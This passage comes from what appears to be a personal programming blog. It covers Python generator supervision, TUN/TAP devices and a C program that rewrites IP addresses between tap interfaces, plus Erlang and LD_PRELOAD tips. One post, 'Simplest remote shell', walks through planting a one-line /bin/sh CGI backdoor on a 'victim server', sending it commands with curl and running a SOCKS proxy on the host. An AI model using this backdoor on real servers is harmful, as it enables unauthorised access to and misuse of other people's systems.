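    """Stand-in for a coroutine that dies halfway through."""
    yield name + ':start'
    raise RuntimeError(name + ' failed')


def supervise(generators):
    left = list(generators)
    output, errors = [], []
    while left:
        new_left = []
        for gen in left:
            try:
                output.append(next(gen))
                new_left.append(gen)
            except StopIteration:
                pass              # finished, drop it
            except Exception as e:
                errors.append(e)  # failed, drop it but remember why
        left = new_left
    return output, errors


out, errs = supervise([chunks('a', 2), failing('b'), chunks('c', 1)])
print(out)                     # prints ['a:0', 'b:start', 'c:0', 'a:1']
print([str(e) for e in errs])  # prints ['b failed']
```

Because control returns to the main thread's Python code after every step, a signal handler gets its chance to run between steps instead of waiting for a join().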

Python, how to open TUN/TAP device

Just a note in case I forget
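import os
import struct
from fcntl import ioctl

# named open_tap so that it does not shadow the builtin open()
def open_tap(n):
    TUNSETIFF = 0x400454ca
    IFF_TUN   = 0x0001
    IFF_TAP   = 0x0002
    TUNMODE = IFF_TAP
    f = os.open("/dev/net/tun", os.O_RDWR)
    # struct ifreq: 16-byte interface name followed by the flags (short)
    ifs = ioctl(f, TUNSETIFF, struct.pack("16sH", ("tap%d" % n).encode(), TUNMODE))
    #ifname = ifs[:16].strip(b"\x00")
    return f
And then as usual
f1 = open_tap(1)
f2 = open_tap(2)

p = os.read(f1, 65000)
os.write(f2, p)

os.close(f1)
os.close(f2)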
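The buffer handed to TUNSETIFF can be inspected without opening /dev/net/tun (which normally needs root). A small sketch; pack_ifreq and unpack_ifname are hypothetical helper names, and only the name and flags part of struct ifreq is packed, as in the note above.

```python
import struct

IFNAMSIZ = 16
IFF_TAP = 0x0002


def pack_ifreq(name, flags):
    """Pack the part of struct ifreq that TUNSETIFF reads: name, then flags."""
    return struct.pack('16sH', name.encode(), flags)


def unpack_ifname(ifreq):
    """Recover the interface name from the first IFNAMSIZ bytes."""
    return ifreq[:IFNAMSIZ].rstrip(b'\0').decode()


req = pack_ifreq('tap1', IFF_TAP)
print(len(req), unpack_ifname(req))  # prints 18 tap1
```

unpack_ifname does what the commented-out ifname line hints at: the kernel writes the actual interface name back into the same buffer.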

Friday, December 20, 2013

Programming TUN/TAP in Linux, changing IP address on the fly

So you want to map one network onto another by implementing your very own bridge that rewrites the network part of the addresses in the IP packets it receives and forwards them to the other segment. Why not, it can be done.
The plan is
  1. Create 2 tap interfaces: tap1 and tap2.
  2. Bridge tap1 with eth0 (i.e. everything that reaches tap1 is forwarded to eth0 by the kernel and vice versa).
  3. The application gets packets from tap2, changes the src and dst IP addresses (network 10.0.1.0/24 becomes 192.168.14.0/24) and writes the resulting packet to tap1 (from there it goes to eth0 and onto the wire).
  4. When the application gets a response from eth0 (via tap1) it substitutes the IPs again and writes the packet to tap2.
Note: the problem with IP substitution is checksums. IP packets have an IP header checksum, and the TCP and UDP checksums also cover a pseudo-header that contains the src and dst IP addresses. See details in the code.
For more information on TUN/TAP see Universal TUN/TAP device driver Frequently Asked Question.
This way, if you are in the 192.168.14.0/24 network and want to talk to 192.168.14.15, after these small manipulations you can talk to that host as if it had the address 10.0.1.15.
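To make the checksum problem concrete, here is a sketch in Python of what has to happen to the IP header when the network part of an address is swapped. It assumes a 20-byte IPv4 header without options; inet_checksum, build_ip_header and rewrite_network are illustrative names and the addresses are just examples. TCP and UDP need the same kind of recalculation over their pseudo-header.

```python
import socket
import struct


def inet_checksum(data):
    """16-bit one's complement sum of the data, complemented (RFC 1071)."""
    if len(data) % 2:
        data += b'\0'
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def with_checksum(header):
    """Return the header with bytes 10..11 set to a freshly computed checksum."""
    body = header[:10] + b'\0\0' + header[12:]
    return body[:10] + struct.pack('!H', inet_checksum(body)) + body[12:]


def build_ip_header(src, dst, proto=17, payload_len=0):
    """Minimal 20-byte IPv4 header (version 4, IHL 5, TTL 64)."""
    header = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + payload_len, 0, 0,
                         64, proto, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    return with_checksum(header)


def rewrite_network(header, old_net, new_net):
    """Swap the first 3 address bytes when they match, then fix the checksum."""
    src, dst = header[12:16], header[16:20]
    if src[:3] == old_net:
        src = new_net + src[3:]
    if dst[:3] == old_net:
        dst = new_net + dst[3:]
    return with_checksum(header[:12] + src + dst)


hdr = build_ip_header('10.0.1.15', '10.0.1.18')
new = rewrite_network(hdr, bytes([10, 0, 1]), bytes([192, 168, 14]))
print(socket.inet_ntoa(new[12:16]), socket.inet_ntoa(new[16:20]))
print(inet_checksum(new))  # prints 0: a header with a valid checksum sums to zero
```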
The setup instructions and the program itself follow without further comment.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <linux/if_tun.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/select.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <sys/uio.h>    /* struct iovec */

#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>


/* 
Replace ip addresses in packets on L2 level.

Setup:

tunctl -t tap1
tunctl -t tap2
brctl addif br1 tap1
brctl addif br1 eth0

ifconfig tap1 promisc up
ifconfig tap2 promisc up

ifconfig tap2 10.0.1.18 netmask 255.255.255.0

Send packets to 10.0.1.0/24 on tap2, they will appear as 192.168.14.0/24 on eth0.
Note that these values are hardcoded in main.

*/


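static int
tun_alloc_old(char *dev) {
    char tunname[sizeof("/dev/") + IFNAMSIZ];

    /* Bounded copy: "/dev/" plus an interface name must not overflow. */
    snprintf(tunname, sizeof(tunname), "/dev/%s", dev);
    return open(tunname, O_RDWR);
}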


static int
tun_alloc(char *dev) {
    struct ifreq    ifr;
    int     fd;
    int     err;

    if ((fd = open("/dev/net/tun", O_RDWR)) < 0)
        return tun_alloc_old(dev);

    memset(&ifr, 0, sizeof(ifr));

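    /* Flags: IFF_TUN   - TUN device (no Ethernet headers)
     *        IFF_TAP   - TAP device
     *
     *        IFF_NO_PI - Do not provide packet information
     *
     * IFF_NO_PI is needed here: substitute() expects the Ethernet frame
     * at offset 0, without the 4-byte packet information header.
     */
    ifr.ifr_flags = IFF_TAP | IFF_NO_PI;
    if (*dev)
        strncpy(ifr.ifr_name, dev, IFNAMSIZ - 1);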

    if ((err = ioctl(fd, TUNSETIFF, (void*)&ifr)) < 0) {
        close(fd);
        perror("TUNSETIFF");
        return err;
    }

    strcpy(dev, ifr.ifr_name);
    return fd;
}


static ssize_t
write2(int fildes, const void *buf, size_t nbyte) {
    const char *p;
    ssize_t     ret;
    size_t      n;

    p = buf;
    n = nbyte;
    while (n > 0) {
        /* Write only what is still pending, not the whole buffer again. */
        ret = write(fildes, p, n);
        if (ret < 0)
            return ret;

        n -= ret;
        p += ret;
    }

    return nbyte;
}


static uint16_t
ipcheck(uint16_t *ptr, size_t len) {
    uint32_t    sum;
    uint16_t    answer;

    sum = 0;

    while (len > 1) {
        sum += *ptr++;
        len -= 2;
    }

    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    answer = ~sum;
    
    return answer;
}


static uint16_t
check2(struct iovec *iov, int iovcnt) {
    long    sum;
    uint16_t    answer;
    struct iovec   *iovp;

    sum = 0;

    for (iovp = iov; iovp < iov + iovcnt; iovp++) {
        uint16_t *ptr;
        size_t len;

        ptr = iovp->iov_base;
        len = iovp->iov_len;

        while (len > 1) {
            sum += *ptr++;
            len -= 2;
        }

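        if (len == 1) {
            /* Pad the trailing odd byte with zero without reading past the buffer. */
            u_char t[2];
            uint16_t last;

            t[0] = *(u_char *)ptr;
            t[1] = 0;
            memcpy(&last, t, sizeof(last));

            sum += last;
        }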

    }

    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    answer = ~sum;
    
    return answer;
}


static void
tcpcheck(struct iphdr *iph, struct tcphdr *tcph, size_t len) {
    struct iovec iov[5];

    iov[0].iov_base = &iph->saddr;
    iov[0].iov_len = 4;
    iov[1].iov_base = &iph->daddr;
    iov[1].iov_len = 4;

    u_char  t[2];
    t[0] = 0;
    t[1] = iph->protocol;
    iov[2].iov_base = t;
    iov[2].iov_len = 2;

    uint16_t l;
    l = htons(tcph->doff * 4 + len);
    iov[3].iov_base = &l;
    iov[3].iov_len = 2;

    iov[4].iov_base = tcph;
    iov[4].iov_len = tcph->doff * 4 + len;

    tcph->check = 0;
    tcph->check = check2(iov, sizeof(iov) / sizeof(struct iovec));
}


static void
udpcheck(struct iphdr *iph, struct udphdr *udph) {
    struct iovec iov[5];

    iov[0].iov_base = &iph->saddr;
    iov[0].iov_len = 4;
    iov[1].iov_base = &iph->daddr;
    iov[1].iov_len = 4;

    u_char  t[2];
    t[0] = 0;
    t[1] = iph->protocol;
    iov[2].iov_base = t;
    iov[2].iov_len = 2;

    uint16_t l;
    l = udph->len;
    iov[3].iov_base = &l;
    iov[3].iov_len = 2;

    iov[4].iov_base = udph;
    iov[4].iov_len = ntohs(udph->len);

    udph->check = 0;
    udph->check = check2(iov, sizeof(iov) / sizeof(struct iovec));
}


static int
substitute(u_char* buf, ssize_t n, u_char* net1, u_char* net2) {

    if (buf[12] == 8 && buf[13] == 6) {
        u_char     *arp;

        arp = buf + 14;

        /* replace ip */
        if (!memcmp(arp + 14, net1, 3)) {
            memcpy(arp + 14, net2, 3);
        }

        if (!memcmp(arp + 24, net1, 3)) {
            memcpy(arp + 24, net2, 3);
        }
    }
    else if (buf[12] == 8 && buf[13] == 0) {
        struct iphdr   *iph;
        size_t      len;


        iph = (struct iphdr*)(buf + 14);
        len = iph->ihl * 4;

        /* clear crc */
        iph->check = 0;


        /* replace ip */
        if (!memcmp(&iph->saddr, net1, 3)) {
            memcpy(&iph->saddr, net2, 3);
        }

        if (!memcmp(&iph->daddr, net1, 3)) {
            memcpy(&iph->daddr, net2, 3);
        }

        /* put new crc */
        iph->check = ipcheck((uint16_t*)iph, len);


        if (iph->protocol == 6) {
            struct tcphdr  *tcph;

            tcph = (struct tcphdr*)((u_char*)iph + len);
            tcpcheck(iph, tcph, n - ((u_char*)tcph - buf) - tcph->doff * 4);
        }
        else if (iph->protocol == 17) {
            struct udphdr  *udph;

            udph = (struct udphdr*)((u_char*)iph + len);
            udpcheck(iph, udph);
        }
    }

    return 0;
}


int
main(int argc, char **argv) {
    int     tap1;
    int     tap2;
    int     maxfd;
    char    tunname[IFNAMSIZ];
    u_char  buf[15000];
    ssize_t n;

    u_char net1[] = {192, 168, 14};
    u_char net2[] = {10, 0, 1};

    strcpy(tunname, "tap1");
    if ((tap1 = tun_alloc(tunname)) < 0) {
        goto error;
    }

    strcpy(tunname, "tap2");
    if ((tap2 = tun_alloc(tunname)) < 0) {
        goto error;
    }

    maxfd = (tap1 > tap2)? tap1 : tap2;

    while (1) {
        int     ret;
        fd_set  rd_set;
        
        FD_ZERO(&rd_set);
        FD_SET(tap1, &rd_set);
        FD_SET(tap2, &rd_set);
    
        ret = select(maxfd + 1, &rd_set, NULL, NULL, NULL);
        
        if (ret < 0 && errno == EINTR) {
            continue;
        }

        if (ret < 0) {
            perror("select()");
            goto error;
        }

        if (FD_ISSET(tap1, &rd_set)) {
            n = read(tap1, buf, sizeof(buf));
            if (n < 0)
                goto error;

            if (substitute(buf, n, net1, net2))
                goto error;

            if (write2(tap2, buf, n) < 0)
                goto error;
        }

        if (FD_ISSET(tap2, &rd_set)) {

            n = read(tap2, buf, sizeof(buf));
            if (n < 0)
                goto error;

            if (substitute(buf, n, net2, net1))
                goto error;

            if (write2(tap1, buf, n) < 0)
                goto error;
        }
    }
    
    close(tap1);
    close(tap2);

    return 0;

error:
    return 1;
}

Simplest remote shell

Any true webmaster has at least once installed a remote shell (backdoor) on a victim server. I've used the simplest backdoor that ever existed.
First create file sh.cgi and upload it to the victim server (don't forget to set execute permissions)
#!/bin/sh

/bin/sh
That is the whole remote shell implementation. Locally create a file, let's say with the name 1
echo -e "Content-Type: text/plain\r\n\r"
uname -a
id
exit 0
Test it
> curl --data-binary @1 http://host/sh.cgi
Linux *** 2.6.26-1-amd64 #1 SMP Fri Mar 13 17:46:45 UTC 2009 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
If you are lucky you can upload files, compile them and run
echo -e "Content-Type: text/plain\r\n\r"
cc socks.c 2>&1
./a.out 2>&1
exit 0
Download socks.c. It implements SOCKS5; the addresses are hardcoded.

Erlang, how to change backlog in http inets server

While moving my very old posts from the old engine I found an interesting problem: increasing the listen backlog from 128, which is inappropriate for a loaded system, to something more suitable. A long time ago (in 2010) the only way I found to do this was to apply the following patch
> diff -u /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl http_transport.erl 
--- /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl     2010-09-28 12:45:42.000000000 +0300
+++ http_transport.erl  2010-12-08 17:57:42.759407719 +0200
@@ -218,7 +218,7 @@
 
 get_socket_info(Addr, Port) ->
     Key  = list_to_atom("httpd_" ++ integer_to_list(Port)),
-    BaseOpts =  [{backlog, 128}, {reuseaddr, true}], 
+    BaseOpts =  [{backlog, 10000}, {reuseaddr, true}], 
     IpFamilyDefault = ipfamily_default(Addr, Port), 
     case init:get_argument(Key) of
        {ok, [[Value]]} ->
I wonder whether this is still true.

Override function in shared library

Let's override write() in libc
#define _GNU_SOURCE /* for RTLD_NEXT */
#include <dlfcn.h>     /* dlsym */
#include <sys/types.h> /* ssize_t */

static ssize_t (*libc_write)(int, const void *, size_t);

void init(void) __attribute__((constructor));
void init(void) {
    libc_write = dlsym(RTLD_NEXT, "write");
}

ssize_t write(int fd, const void *buf, size_t count) {
    // do what you want here
    return libc_write(fd, buf, count);
}
Then one needs to build the .so (e.g. gcc -shared -fPIC write.c -o write.so -ldl, assuming the source is saved as write.c) and have it loaded before libc.so, something like
LD_PRELOAD=/path/to/so/with/our/write.so victim_program
See Function Attributes, dlsym(3).